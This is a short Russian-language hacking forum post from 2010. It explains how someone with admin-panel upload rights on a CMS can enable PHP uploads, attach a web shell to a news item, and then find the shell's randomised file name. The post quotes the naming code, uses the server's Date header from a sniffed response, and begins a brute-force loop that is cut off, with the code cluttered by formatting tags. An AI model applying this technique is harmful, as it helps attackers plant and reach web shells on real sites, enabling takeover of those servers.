22.06.2010, 08:35
|
|
Новичок
Регистрация: 30.04.2010
Сообщений: 8
С нами:
8438441
Репутация:
0
|
|
В админке разрешаешь заливку php файлов, добавляешь новость и прикрепляешь файл к ней, т.е. сам шелл и всё. После смотришь имя, которое ему присвоилось таким способом:
Описание: Получение названия загруженного файла (шелла, к примеру) через форму заливки
Зависимость: Права админа или журналиста с разрешением заливать файлы через админку
Файл: /admin.php?mod=files
Кусок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"];
@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imageurl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/uploads/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$image_name[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Ага, пишется: unixtime+{случайное число от 1 до 100}_название_файла_что_мы_вы рузили
Отсылаем файл, снифаем, что вернул сервер:
Date: Mon, 14 Jun 2010 07:35:04 GMT
делаем себе
[PHP]
[COLOR="#000000"] for($i=0;$i[COLOR="#007700"] |
|
|